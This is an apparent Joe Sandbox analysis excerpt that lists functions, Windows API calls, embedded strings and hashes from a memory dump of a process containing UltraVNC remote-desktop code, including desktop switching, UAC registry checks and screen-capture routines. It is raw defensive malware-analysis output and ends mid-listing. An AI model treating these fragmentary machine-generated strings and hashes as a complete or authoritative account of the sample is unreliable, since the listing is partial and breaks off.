vistahook.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF790C4A219
cad.exe, xrefs: 00007FF790C4A599
EnableLUA, xrefs: 00007FF790C4A496
vistahook.cpp : OpenInputdesktop OK, xrefs: 00007FF790C4A1A4
UltraVNC Warning, xrefs: 00007FF790C4A669
UAC is Disable, make registry changes to allow cad, xrefs: 00007FF790C4A283
open, xrefs: 00007FF790C4A5C8
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00007FF790C4A45C
-softwarecadhelper, xrefs: 00007FF790C4A335
Ctrl-alt-del require service, no permission, xrefs: 00007FF790C4A5E3
Ctrl-alt-del require service, no permission, xrefs: 00007FF790C4A656
vistahook.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF790C4A23B
vistahook.cpp : !GetUserObjectInformation , xrefs: 00007FF790C4A1F3
vistahook.cpp : OpenInputdesktop Error , xrefs: 00007FF790C4A19B
Winsta0\Default, xrefs: 00007FF790C4A37A
Global\SessionEventUltraCad, xrefs: 00007FF790C4A414, 00007FF790C4A4CC
Warning, xrefs: 00007FF790C4A27C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 1732492099-311746058
Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
Instruction ID: 130190df1564597f7469e8336f7cd8f775fcfcec3cc34c801e9275ea945c10ec
Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
Instruction Fuzzy Hash: 5EF15632A28B4285EB24EB31A8842E9B3A6FF45754F841236DA5D47BA4DF3CF544C720

Function 00007FF790C44C10 Relevance: 77.4, APIs: 42, Strings: 2, Instructions: 357windowCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF790C44C41
SetWindowLongPtrA.USER32 ref: 00007FF790C44C89
EndDialog.USER32 ref: 00007FF790C44CA2
_snprintf.LIBCMT ref: 00007FF790C44CD0
_snprintf.LIBCMT ref: 00007FF790C44D0E
SetWindowTextA.USER32 ref: 00007FF790C44D1B
SetDlgItemTextA.USER32 ref: 00007FF790C44D3E
SendDlgItemMessageA.USER32 ref: 00007FF790C44D72
LoadStringA.USER32 ref: 00007FF790C44DCA
GetDlgItem.USER32 ref: 00007FF790C44E16
GetScrollInfo.USER32 ref: 00007FF790C44E29
SendDlgItemMessageA.USER32 ref: 00007FF790C44E67
SetForegroundWindow.USER32 ref: 00007FF790C44E70
GetDlgItem.USER32 ref: 00007FF790C44E7E
GetWindowLongPtrA.USER32 ref: 00007FF790C44E8C
GetDlgItem.USER32 ref: 00007FF790C44EA3
SetWindowLongPtrA.USER32 ref: 00007FF790C44EB4
GetDlgItem.USER32 ref: 00007FF790C44EED
GetWindowRect.USER32 ref: 00007FF790C44EFB
GetDlgItem.USER32 ref: 00007FF790C44F2E
MoveWindow.USER32 ref: 00007FF790C44F4F
GetDlgItem.USER32 ref: 00007FF790C44F5D
MoveWindow.USER32 ref: 00007FF790C44F83
GetDlgItem.USER32 ref: 00007FF790C44F91
MoveWindow.USER32 ref: 00007FF790C44FB4
GetDlgItem.USER32 ref: 00007FF790C44FC2
MoveWindow.USER32 ref: 00007FF790C44FE9
GetDlgItem.USER32 ref: 00007FF790C44FF7
MoveWindow.USER32 ref: 00007FF790C4501E
GetDlgItem.USER32 ref: 00007FF790C4502C
MoveWindow.USER32 ref: 00007FF790C45053
InvalidateRect.USER32 ref: 00007FF790C45061
EndDialog.USER32 ref: 00007FF790C45081
GetDlgItemTextA.USER32 ref: 00007FF790C450D7
ShowWindow.USER32 ref: 00007FF790C4527C
SetForegroundWindow.USER32 ref: 00007FF790C45286

Strings

Chat with <%s> - UltraVNC, xrefs: 00007FF790C44CFD
MS Sans Serif, xrefs: 00007FF790C44D47

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
String ID: Chat with <%s> - UltraVNC$MS Sans Serif
API String ID: 3122538718-446500584
Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
Instruction ID: ef50d7ae051716b062113851cb3d417d271edbba5d94b9b64561376b379fcc2b
Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
Instruction Fuzzy Hash: 4FF17A71A2864286EB74EB36E4043A9B3A1FF89B94F905131CE0E47BA5CF7CF5498710

Function 00007FF790C5F980 Relevance: 65.1, APIs: 20, Strings: 17, Instructions: 347libraryloaderwindowCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF790C5FA05
LoadLibraryA.KERNEL32 ref: 00007FF790C5FA1A
GetProcAddress.KERNEL32 ref: 00007FF790C5FA3E
FreeLibrary.KERNEL32 ref: 00007FF790C5FBB2
EnumWindows.USER32 ref: 00007FF790C5FBEF
GetDC.USER32 ref: 00007FF790C5FC4A
CreateCompatibleDC.GDI32 ref: 00007FF790C5FD6A
GetLastError.KERNEL32 ref: 00007FF790C5FD7C
GetDeviceCaps.GDI32 ref: 00007FF790C5FDC4
GetDeviceCaps.GDI32 ref: 00007FF790C5FDFE
CreateCompatibleBitmap.GDI32 ref: 00007FF790C5FE38
GetLastError.KERNEL32 ref: 00007FF790C5FE4A
GetDIBits.GDI32 ref: 00007FF790C5FED6

Strings

WinVNC, xrefs: 00007FF790C5FDCF, 00007FF790C5FE08
vncdesktop.cpp : No driver used , xrefs: 00007FF790C5FBFE
vncdesktop.cpp : unable to get display format, xrefs: 00007FF790C5FEE0
vncdesktop.cpp : got bitmap format, xrefs: 00007FF790C5FF4B
USER32, xrefs: 00007FF790C5FA0B
vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver, xrefs: 00007FF790C5FE0F
vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver, xrefs: 00007FF790C5FDD6
vncdesktop.cpp : Failed m_rootdc , xrefs: 00007FF790C5FC5C
DISPLAY, xrefs: 00007FF790C5FB1E
vncdesktop.cpp : bitmap dimensions are %d x %d, xrefs: 00007FF790C5FD4B
vncdesktop.cpp : unable to get display colour info, xrefs: 00007FF790C5FF33
vncdesktop.cpp : failed to create memory bitmap(%d), xrefs: 00007FF790C5FE50
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF790C5FAED
mv video hook driver2, xrefs: 00007FF790C5FAA8
vncdesktop.cpp : failed to create compatibleDC(%d), xrefs: 00007FF790C5FD82
vncdesktop.cpp : created memory bitmap, xrefs: 00007FF790C5FE72
EnumDisplayDevicesA, xrefs: 00007FF790C5FA2C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
API String ID: 3851920378-1343955350
Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
Instruction ID: 98316b427450f67cd14041ffcd04970e8beb115d28bedc3f031f413a789c4081
Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
Instruction Fuzzy Hash: 3B025A76A286C286EB24EF74D4506E9B7A1FF86B48F845436CA4D5B398DF3CE045C720

Function 00007FF790C48980 Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 264registrythreadlibraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C489B4
GetProcAddress.KERNEL32 ref: 00007FF790C489D8
EnumDisplaySettingsA.USER32 ref: 00007FF790C48A24
wprintf.LIBCMT ref: 00007FF790C48AA8
FreeLibrary.KERNEL32 ref: 00007FF790C48AB0
wprintf.LIBCMT ref: 00007FF790C48B21
RegCreateKeyA.ADVAPI32 ref: 00007FF790C48BE3
RegCreateKeyA.ADVAPI32 ref: 00007FF790C48C07
RegSetValueExA.ADVAPI32 ref: 00007FF790C48C41
RegCloseKey.ADVAPI32 ref: 00007FF790C48C54
RegCloseKey.ADVAPI32 ref: 00007FF790C48C5F
RegCreateKeyA.ADVAPI32 ref: 00007FF790C48C93
RegCreateKeyA.ADVAPI32 ref: 00007FF790C48CB3
RegSetValueExA.ADVAPI32 ref: 00007FF790C48CED
RegCloseKey.ADVAPI32 ref: 00007FF790C48D00
RegCloseKey.ADVAPI32 ref: 00007FF790C48D0B
GetCurrentThreadId.KERNEL32 ref: 00007FF790C48D72
GetThreadDesktop.USER32 ref: 00007FF790C48D7A
OpenInputDesktop.USER32 ref: 00007FF790C48D92
SetThreadDesktop.USER32 ref: 00007FF790C48DA3
ChangeDisplaySettingsExA.USER32 ref: 00007FF790C48DC0
ChangeDisplaySettingsExA.USER32 ref: 00007FF790C48DDA
SetThreadDesktop.USER32 ref: 00007FF790C48DE8
CloseDesktop.USER32 ref: 00007FF790C48DFA

Strings

SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2, xrefs: 00007FF790C48BD0
DEVICE0, xrefs: 00007FF790C48B60
SYSTEM\CurrentControlSet\Hardware Profiles\Current, xrefs: 00007FF790C48C7D
mv2, xrefs: 00007FF790C48D2C
\DEVICE, xrefs: 00007FF790C48B32
mv video hook driver2, xrefs: 00007FF790C48A74, 00007FF790C48A9A
No '%s' found., xrefs: 00007FF790C48AA1
DevNum:%dName:%sString:%sID:%sKey:%s, xrefs: 00007FF790C48B12
USER32, xrefs: 00007FF790C489A7
Attach.ToDesktop, xrefs: 00007FF790C48C1F, 00007FF790C48CCB
SYSTEM, xrefs: 00007FF790C48C65
EnumDisplayDevicesA, xrefs: 00007FF790C489C6

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 4207610217-3713657650
Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
Instruction ID: 0ef41a44bfb4f0e16894c928c5c736537a336b46cb761a2249b7fd4ed96db272
Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
Instruction Fuzzy Hash: 46C16062A29A8385EB70EB31A8502EEB3B5FF85784F845035DA4E57B94DF7CE109C710

Function 00007FF790C60330 Relevance: 56.2, APIs: 20, Strings: 12, Instructions: 220windowCOMMON

Download Yara Rule

APIs

GetSystemPaletteEntries.GDI32 ref: 00007FF790C603ED
CreatePalette.GDI32 ref: 00007FF790C60403
SelectPalette.GDI32 ref: 00007FF790C60447
DeleteObject.GDI32 ref: 00007FF790C60475
RealizePalette.GDI32 ref: 00007FF790C604B5
DeleteObject.GDI32 ref: 00007FF790C604E3
GetSystemPaletteEntries.GDI32 ref: 00007FF790C60524
CreateCompatibleDC.GDI32 ref: 00007FF790C605C5
GetLastError.KERNEL32 ref: 00007FF790C605D3
SelectObject.GDI32 ref: 00007FF790C60602
GetLastError.KERNEL32 ref: 00007FF790C60610
DeleteDC.GDI32 ref: 00007FF790C60631
SetDIBColorTable.GDI32 ref: 00007FF790C6064B
GetLastError.KERNEL32 ref: 00007FF790C60655
SelectObject.GDI32 ref: 00007FF790C60679
GetLastError.KERNEL32 ref: 00007FF790C60684
DeleteObject.GDI32 ref: 00007FF790C606A5
DeleteDC.GDI32 ref: 00007FF790C606AE
DeleteObject.GDI32 ref: 00007FF790C606BE
DeleteDC.GDI32 ref: 00007FF790C606C7

Strings

vncdesktop.cpp : unable to create temporary DC, xrefs: 00007FF790C605D9
vncdesktop.cpp : unable to set DIB section palette, xrefs: 00007FF790C6065B
vncdesktop.cpp : no palette data for truecolour display, xrefs: 00007FF790C606D7
vncdesktop.cpp : unable to select DIB section into temporary DC, xrefs: 00007FF790C60616
vncdesktop.cpp : unable to get system palette entries, xrefs: 00007FF790C603F7
vncdesktop.cpp : unable to allocate logical palette, xrefs: 00007FF790C603B6
vncdesktop.cpp : unable to create HPALETTE, xrefs: 00007FF790C60411
vncdesktop.cpp : warning - failed to RealizePalette, xrefs: 00007FF790C604C0
vncdesktop.cpp : unable to restore temporary DC bitmap, xrefs: 00007FF790C6068A
vncdesktop.cpp : framebuffer has %u palette entries, xrefs: 00007FF790C6052A
vncdesktop.cpp : initialised palette OK, xrefs: 00007FF790C604E9
vncdesktop.cpp : unable to select() HPALETTE, xrefs: 00007FF790C60455

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
API String ID: 463275814-2693335352
Opcode ID: bac5f81a3a5e155526e90384c9b81cfe27e32c18590eb1aaea68509ec9771b6c
Instruction ID: ab3bf992ab399c13a8a773fddcd9b704082c40565eee5026b690e8f0a6cccdec
Opcode Fuzzy Hash: bac5f81a3a5e155526e90384c9b81cfe27e32c18590eb1aaea68509ec9771b6c
Instruction Fuzzy Hash: 50A19065A28A8385FA34FB3594042FAA3A1FF86B58FD45431C94E57395DE3CF04AC760

Function 00007FF790C48E10 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 272registrythreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C48E5C
GetProcAddress.KERNEL32 ref: 00007FF790C48E78
EnumDisplaySettingsA.USER32 ref: 00007FF790C48EB5
wprintf.LIBCMT ref: 00007FF790C48F68
FreeLibrary.KERNEL32 ref: 00007FF790C48F70
wprintf.LIBCMT ref: 00007FF790C48FCF
RegCreateKeyA.ADVAPI32 ref: 00007FF790C49096
RegCreateKeyA.ADVAPI32 ref: 00007FF790C490BA
RegSetValueExA.ADVAPI32 ref: 00007FF790C490F6
GetCurrentThreadId.KERNEL32 ref: 00007FF790C4918E
GetThreadDesktop.USER32 ref: 00007FF790C49196
OpenInputDesktop.USER32 ref: 00007FF790C491AE
SetThreadDesktop.USER32 ref: 00007FF790C491BF
ChangeDisplaySettingsExA.USER32 ref: 00007FF790C491DC
ChangeDisplaySettingsExA.USER32 ref: 00007FF790C491FE
SetThreadDesktop.USER32 ref: 00007FF790C4920E
CloseDesktop.USER32 ref: 00007FF790C4921C
RegCloseKey.ADVAPI32 ref: 00007FF790C49227
RegCloseKey.ADVAPI32 ref: 00007FF790C49232
FreeLibrary.KERNEL32 ref: 00007FF790C4923B

Strings

SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2, xrefs: 00007FF790C49080
DEVICE0, xrefs: 00007FF790C4900E
mv2, xrefs: 00007FF790C49121
\DEVICE, xrefs: 00007FF790C48FE0
mv video hook driver2, xrefs: 00007FF790C48F34, 00007FF790C48F5A
No '%s' found., xrefs: 00007FF790C48F61
DevNum:%dName:%sString:%sID:%sKey:%s, xrefs: 00007FF790C48FC0
USER32, xrefs: 00007FF790C48E3E
Attach.ToDesktop, xrefs: 00007FF790C490D7
EnumDisplayDevicesA, xrefs: 00007FF790C48E6E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 27940619-3388178877
Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction ID: c82cbb12e43c582b2ac58d48948389a29dec5fa31ac82abfc3f1b4a6c8e3ed5c
Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction Fuzzy Hash: 53C18D32A2868286EB70EF35A8402EAB7E2FF85794F845035DA4E57794DF3CE509C710

Function 00007FF790C35A60 Relevance: 50.9, APIs: 17, Strings: 12, Instructions: 154libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C35AAE
GetModuleFileNameA.KERNEL32 ref: 00007FF790C35B07
LoadLibraryA.KERNEL32 ref: 00007FF790C35B84
GetProcAddress.KERNEL32 ref: 00007FF790C35BA8
GetProcAddress.KERNEL32 ref: 00007FF790C35BC3
GetProcAddress.KERNEL32 ref: 00007FF790C35BDE
GetProcAddress.KERNEL32 ref: 00007FF790C35BF9
GetProcAddress.KERNEL32 ref: 00007FF790C35C14
GetProcAddress.KERNEL32 ref: 00007FF790C35C2F
GetProcAddress.KERNEL32 ref: 00007FF790C35C4A
GetProcAddress.KERNEL32 ref: 00007FF790C35C65
GetProcAddress.KERNEL32 ref: 00007FF790C35C80
GetProcAddress.KERNEL32 ref: 00007FF790C35C9B
GetProcAddress.KERNEL32 ref: 00007FF790C35CB6
GetProcAddress.KERNEL32 ref: 00007FF790C35CD1
FreeLibrary.KERNEL32 ref: 00007FF790C35D33
DeleteFileA.KERNEL32 ref: 00007FF790C35D49

Strings

Shutdown, xrefs: 00007FF790C35BD0
Config, xrefs: 00007FF790C35CC3
SetParams, xrefs: 00007FF790C35BEB
FreeBuffer, xrefs: 00007FF790C35C57
CreatePluginInterface, xrefs: 00007FF790C35C8D
TransformBuffer, xrefs: 00007FF790C35C21
RestoreBuffer, xrefs: 00007FF790C35C3C
Reset, xrefs: 00007FF790C35C72
GetParams, xrefs: 00007FF790C35C06
Startup, xrefs: 00007FF790C35BB5
Description, xrefs: 00007FF790C35BA1
CreateIntegratedPluginInterface, xrefs: 00007FF790C35CA8

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
API String ID: 1650122287-1031704962
Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
Instruction ID: 1c2055691a0517db854ff7e1a0aced8da2a12fc2ece738723002938ec4ec814d
Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
Instruction Fuzzy Hash: 7681EB32929A8291EB21AF34E4543EDB3B0FB99B58F845135DE5D4B394DF78E644C320

Function 00007FF790CEA228 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328timeCOMMON

Download Yara Rule

APIs

